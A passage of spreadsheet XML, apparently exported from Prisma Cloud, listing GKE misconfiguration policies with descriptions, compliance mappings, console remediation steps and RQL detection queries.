      <c r="U2880" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2880" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2880" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes Engine Clusters which have enabled legacy authorizer. The legacy authorizer in Kubernetes Engine grants broad and statically defined permissions to all cluster users. After legacy authorizer setting is disabled, RBAC can limit permissions for authorized users based on need.</t>
        </is>
      </c>
      <c r="X2880" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters
4. From the list of clusters, choose the reported cluster
5. Under 'Security', click on edit button (Pencil Icon) for Legacy authorization
6. Uncheck 'Enable legacy authorization' checkbox
7. Click on Save Changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2</t>
        </is>
      </c>
      <c r="Y2880" t="inlineStr"/>
      <c r="Z2880" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'legacyAbac.enabled equals true'
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2880" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2880" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2880" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-148-CKV_GCP_7</t>
        </is>
      </c>
      <c r="AD2880" t="b">
        <v>1</v>
      </c>
      <c r="AE2880" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2880" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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0" t="inlineStr">
        <is>
          <t>f57baa2a-6039-4a17-94e8-0be723bcdc75</t>
        </is>
      </c>
      <c r="AI2880" t="inlineStr">
        <is>
          <t>9c835b12-e60a-4590-9e5e-5dd959774d71</t>
        </is>
      </c>
      <c r="AJ2880" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2880" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2881">
      <c r="A2881" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF, New Zealand Information Security Manual (NZISM v3.4), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, CSA CCM v.4.0.6, CIS Controls v7.1, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, PCI DSS v4.0, ISO/IEC 27017:2015, Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, CSA CCM v.4.0.1, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, CIS Controls v8, NIST CSF, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2881" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2881" s="2" t="inlineStr"/>
      <c r="D2881" t="inlineStr"/>
      <c r="E2881" t="inlineStr"/>
      <c r="F2881" t="inlineStr"/>
      <c r="G2881" t="b">
        <v>0</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2881" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2881" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters not configured with network traffic egress metering</t>
        </is>
      </c>
      <c r="L2881" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2881" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2881" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2881" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2881" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2881" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2881" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2881" t="inlineStr"/>
      <c r="T2881" t="b">
        <v>0</v>
      </c>
      <c r="U2881" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2881" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2881" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Clusters which are not configured with network traffic egress metering. When network traffic egress metering enabled, deployed DaemonSet pod meters network egress traffic by collecting data from the conntrack table, and exports the metered metrics to the specified destination. It is recommended to use, network egress metering so that you will be having data and track over monitored network traffic.
NOTE: Measuring network egress requires a network metering agent (NMA) running on each node. The NMA runs as a privileged pod, consumes some resources on the node (CPU, memory, and disk space), and enables the nf_conntrack_acct sysctl flag on the kernel (for connection tracking flow accounting). If you are comfortable with these caveats, you can enable network egress tracking for use with GKE usage metering.</t>
        </is>
      </c>
      <c r="X2881" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable GKE usage metering:
https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering#enabling</t>
        </is>
      </c>
      <c r="Y2881" t="inlineStr"/>
      <c r="Z2881" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule =  'resourceUsageExportConfig.enableNetworkEgressMetering does not exist or resourceUsageExportConfig.enableNetworkEgressMetering is false'</t>
        </is>
      </c>
      <c r="AA2881" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2881" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2881" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-367</t>
        </is>
      </c>
      <c r="AD2881" t="b">
        <v>1</v>
      </c>
      <c r="AE2881" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2881" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>dd7a6aaf-e5bb-4a24-a187-37f4d9686feb</t>
        </is>
      </c>
      <c r="AI2881" t="inlineStr">
        <is>
          <t>76a3fc59-1e56-4212-8e4f-bbbd86814548</t>
        </is>
      </c>
      <c r="AJ2881" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2881" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2882">
      <c r="A2882" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, CIS Controls v7.1, PCI DSS v3.2.1, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, NIST 800-53 Rev4, CSA CCM v.4.0.6, CIS Controls v7.1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, ISO 27002:2022, DORA, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, PCI DSS v4.0, NIST CSF, NIST 800-53 Rev4, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, NIST SP 800-171 Revision 3, NIST SP 800-172, SOC 2, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2882" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2882" s="2" t="inlineStr"/>
      <c r="D2882" t="inlineStr"/>
      <c r="E2882" t="inlineStr"/>
      <c r="F2882" t="inlineStr"/>
      <c r="G2882" t="b">
        <v>0</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2882" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2882" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters using the default network</t>
        </is>
      </c>
      <c r="L2882" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2882" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2882" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2882" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2882" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2882" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R2882" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S2882" t="inlineStr"/>
      <c r="T2882" t="b">
        <v>0</v>
      </c>
      <c r="U2882" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2882" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2882" t="inlineStr">
        <is>
          <t>This policy identifies Google Kubernetes Engine (GKE) clusters that are configured to use the default network. Because GKE uses this network when creating routes and firewalls for the cluster, as a best practice define a network configuration that meets your security and networking requirements for ingress and egress traffic, instead of using the default network.</t>
        </is>
      </c>
      <c r="X2882" t="inlineStr">
        <is>
          <t>You cannot change the network attached to an existing GKE cluster. To resolve this alert, create a new cluster with a custom network that meets your requirements, then migrate the cluster data from the reported cluster to this newly created GKE cluster and delete the reported GKE cluster.
To create new Kubernetes engine cluster with the custom network, perform the following:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. Click on CREATE CLUSTER button
5. Set new cluster parameters as per your requirement and make sure 'Network' is set to other than 'default' under Networking section.
6. Click on Save
To delete reported Kubernetes engine cluster, perform the following:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. Click on reported Kubernetes cluster
5. Click on the DELETE button
6. On 'Delete a cluster' popup dialog, Click on DELETE to confirm the deletion of the cluster.</t>
        </is>
      </c>
      <c r="Y2882" t="inlineStr"/>
      <c r="Z2882" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'network equals default'</t>
        </is>
      </c>
      <c r="AA2882" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2882" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2882" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-363</t>
        </is>
      </c>
      <c r="AD2882" t="b">
        <v>1</v>
      </c>
      <c r="AE2882" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2882" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>8212ac16-362c-4555-b182-76e9963434fb</t>
        </is>
      </c>
      <c r="AI2882" t="inlineStr">
        <is>
          <t>59d46b3c-dee1-40c1-af38-03819291dcab</t>
        </is>
      </c>
      <c r="AJ2882" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2882" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2883">
      <c r="A2883" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, CIS v1.5.0 (GKE) - Level 1, CIS Controls v8.1, NIST SP 800-172, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v4.0.12, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.2.0 (GKE), CIS v1.4.0 (GKE) - Level 1, CSA CCM v.4.0.6, NIST SP 800-171 Revision 3, ISO 27002:2022, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, tadenugba Copy of CIS v1.1.0 (GKE), PCI DSS v4.0, PCI DSS v3.2.1, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS Controls v8, CIS v1.3.0 (GKE) - Level 1, Copy of CIS Controls v8, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, CIS Controls v7.1, CIS v1.1.0 (GKE), ISO/IEC 27002:2013, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2883" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2883" s="2" t="inlineStr"/>
      <c r="D2883" t="inlineStr"/>
      <c r="E2883" t="inlineStr"/>
      <c r="F2883" t="inlineStr"/>
      <c r="G2883" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2883" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2883" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine cluster not using Release Channel for version management</t>
        </is>
      </c>
      <c r="L2883" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2883" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2883" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2883" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2883" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2883" t="inlineStr">
        <is>
          <t>CIS Control 16</t>
        </is>
      </c>
      <c r="R2883" t="inlineStr">
        <is>
          <t>16.7</t>
        </is>
      </c>
      <c r="S2883" t="inlineStr"/>
      <c r="T2883" t="b">
        <v>0</v>
      </c>
      <c r="U2883" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2883" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2883" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes Engine clusters that are not using Release Channel for version management. Subscribing to a specific release channel reduces version management complexity. 
The Regular release channel upgrades every few weeks and is for production users who need features not yet offered in the Stable channel. These versions have passed internal validation, but don't have enough historical data to guarantee their stability. Known issues generally have known workarounds.
The Stable release channel upgrades every few months and is for production users who need stability above all else, and for whom frequent upgrades are too risky. These versions have passed internal validation and have been shown to be stable and reliable in production, based on the observed performance of those clusters.</t>
        </is>
      </c>
      <c r="X2883" t="inlineStr">
        <is>
          <t>1. Log in to gcloud console
2. Navigate to service 'Kubernetes Engine'
3. From the list of available clusters, select the reported cluster
4. Go to the 'Release channel' configuration
5. To edit, Click on the 'UPGRADE AVAILABLE' or 'Edit release channel'(Whichever available)
6. In the 'Edit version' pop-up, select the required release channel(Regular Channel/ Stable Channel/ Rapid Channel) from the 'Release channel' dropdown
7. Click on 'SAVE CHANGES' or 'CHANGE'.
Know more on Release Channels here: https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set</t>
        </is>
      </c>
      <c r="Y2883" t="inlineStr"/>
      <c r="Z2883" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = releaseChannel.channel does not exist
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2883" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2883" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2883" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-604-CKV_GCP_70</t>
        </is>
      </c>
      <c r="AD2883" t="b">
        <v>1</v>
      </c>
      <c r="AE2883" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2883" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>6b65e730-d5bf-400c-9a08-9721d6ccdf4a</t>
        </is>
      </c>
      <c r="AI2883" t="inlineStr">
        <is>
          <t>7456f76f-cef6-40e6-bf60-18bae6fddd8a</t>
        </is>
      </c>
      <c r="AJ2883" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2883" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2884">
      <c r="A2884" t="inlineStr">
        <is>
          <t>Copy of CIS Controls v8, CIS v1.4.0 (GKE) - Level 1, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-172, ISO/IEC 27017:2015, MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v4.0, MITRE ATT&amp;CK v10.0 [Deprecated], APRA (CPS 234) Information Security, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v4.0, MITRE ATT&amp;CK v6.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CIS Controls v7.1, CIS v1.2.0 (GKE), CIS v1.3.0 (GKE) - Level 1, NIST CSF, CIS Controls v8.1, ISO/IEC 27017:2015, ISO 27002:2022, tadenugba Copy of CIS v1.1.0 (GKE), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS Controls v8, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v1.1.0 (GKE), PCI DSS v3.2.1, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, FFIEC, APRA (CPS 234) Information Security, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v12, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CCPA 2018, ISO/IEC 27001:2022, PIPEDA, Brazilian Data Protection Law (LGPD), ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS v1.5.0 (GKE) - Level 1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2884" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2884" s="2" t="inlineStr"/>
      <c r="D2884" t="inlineStr"/>
      <c r="E2884" t="inlineStr"/>
      <c r="F2884" t="inlineStr"/>
      <c r="G2884" t="b">
        <v>1</v>
      </c>
      <c r="H28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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2884" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2884" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have legacy compute engine metadata endpoints enabled</t>
        </is>
      </c>
      <c r="L2884" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2884" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2884" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2884" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2884" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2884" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2884" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2884" t="inlineStr"/>
      <c r="T2884" t="b">
        <v>0</v>
      </c>
      <c r="U2884" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2884" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2884" t="inlineStr">
        <is>
          <t>This policy identifies Google Kubernetes Engine (GKE) clusters that have legacy compute engine metadata endpoints enabled. Because GKE uses instance metadata to configure node VMs, some of this metadata is potentially sensitive and should be protected from workloads running on the cluster. Legacy metadata APIs expose the Compute Engine's instance metadata of server endpoints. As a best practice, disable legacy API and use v1 APIs to restrict a potential attacker from retrieving instance metadata.</t>
        </is>
      </c>
      <c r="X2884" t="inlineStr">
        <is>
          <t>You can currently disable legacy metadata APIs only when creating a new cluster, or when adding a new node pool to an existing cluster. To fix this alert, create a new GKE cluster with legacy metadata APIs disabled, migrate all required data from the reported cluster to the newly created cluster before you delete the reported GKE cluster.
To create new Kubernetes engine cluster with private node feature enabled, perform the following:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. Click on CREATE CLUSTER button
5. Under the Node pools section, Click on the 'More node pool options' button
6. On 'Edit node pool' window, For 'GCE instance metadata' click on 'Add metadata'
7. Add 'disable-legacy-endpoints' as a metadata key and 'true' as a metadata value
8. Click on 'Save'
9. Click on 'Create'
To delete reported Kubernetes engine cluster, perform the following:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. Click on reported Kubernetes cluster
5. Click on the DELETE button
6. On 'Delete a cluster' popup dialog, Click on DELETE to confirm the deletion of the cluster. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled</t>
        </is>
      </c>
      <c r="Y2884" t="inlineStr"/>
      <c r="Z2884" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = "nodePools[*].config.metadata does not exist or nodePools[*].config.metadata does not contain disable-legacy-endpoints or nodePools[*].config.metadata.disable-legacy-endpoints does not contain true"
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2884" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2884" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2884" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-366-CKV_GCP_67</t>
        </is>
      </c>
      <c r="AD2884" t="b">
        <v>1</v>
      </c>
      <c r="AE2884" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2884" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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4" t="inlineStr">
        <is>
          <t>3c2b1b56-a6d4-41c1-b306-4edc2c840c19</t>
        </is>
      </c>
      <c r="AI2884" t="inlineStr">
        <is>
          <t>ea1503e1-6927-4416-ac45-b975571d96cb</t>
        </is>
      </c>
      <c r="AJ2884" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2884" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2885">
      <c r="A2885" t="inlineStr">
        <is>
